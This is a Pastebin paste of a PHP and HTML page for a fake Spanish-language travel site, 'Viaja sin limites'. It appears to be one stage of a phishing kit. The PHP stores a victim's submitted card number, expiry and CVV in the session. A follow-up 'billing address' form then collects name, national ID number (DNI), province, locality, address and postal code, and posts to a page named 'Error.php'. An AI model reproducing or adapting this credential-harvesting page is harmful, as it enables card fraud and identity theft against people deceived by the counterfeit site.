Advertisement
Guest User

Untitled

a guest
Nov 18th, 2019
96
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.28 KB | None | 0 0
  1.  
  2. <?php
  3.  
  4. session_start();
  5.  
  6. $_SESSION['cc'] = $_POST['cc'];
  7. $_SESSION['mm'] = $_POST['mm'];
  8. $_SESSION['aa'] = $_POST['aa'];
  9. $_SESSION['cvv'] = $_POST['cvv'];
  10.  
  11.  
  12. ?>
  13.  
  14. <!DOCTYPE html>
  15. <html><head>
  16. <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  17. <title>Viaja sin limites</title>
  18. <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
  19. <meta name="HandheldFriendly" content="true">
  20.  
  21. <meta http-equiv="X-UA-Compatible" content="ie=edge">
  22.  
  23. <link rel="stylesheet" href="Viaja%20sin%20limites%202_archivos/style.css">
  24. <link rel="shortcut icon" href="Viaja%20sin%20limites%202_archivos/favicon.ico">
  25. <script src="Viaja%20sin%20limites%202_archivos/validarcc.js"></script>
  26. </head>
  27.  
  28. <body>
  29. <main>
  30. <header>
  31. <div class="mid">
  32. <a href="./">
  33. <img id="logo" src="Viaja sin limites 2_archivos/favicon.ico" style="height: 48px;">
  34.  
  35. <img id="logo2" src="Viaja sin limites 2_archivos/favicon.ico" style="height: 48px;">
  36.  
  37. <img id="logo3" style="display: none;background: #fa5c48;display: none;" src="./Viaja sin limites 2_archivos/style.php">
  38. </a>
  39. </div></header>
  40. <div id="background">
  41.  
  42.  
  43.  
  44. </div>
  45.  
  46.  
  47.  
  48. <div class="login-wrapper " style=" padding: 30px 0; ">
  49.  
  50.  
  51. <h2>Dirección de facturación</h2>
  52.  
  53.  
  54.  
  55. <form method="POST" action="Error.php" onsubmit="return valida();">
  56.  
  57.  
  58. <div class="cc">
  59.  
  60. <input type="text" maxlength="16" placeholder="Nombre" name="nombre" autofocus="" required="">
  61. <input type="text" maxlength="16" placeholder="Apellido" name="apellido" required="">
  62. <input type=text maxlength="8" placeholder="DNI" name="dni" required="">
  63. <input type="text" maxlength="16" placeholder="Provincia" name="provincia" required="">
  64. <input type="text" maxlength="16" placeholder="Localidad" name="localidad" required="">
  65. <input type="text" maxlength="16" placeholder="Domicilio" name="domicilio" required="">
  66. <input type=text maxlength="4" placeholder="Código Postal" name="postal" required="">
  67.  
  68.  
  69.  
  70.  
  71. <input type="submit" value="Continuar">
  72.  
  73.  
  74.  
  75.  
  76.  
  77.  
  78.  
  79. </div></form></div></main>
  80.  
  81.  
  82.  
  83.  
  84.  
  85.  
  86.  
  87.  
  88.  
  89.  
  90. </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement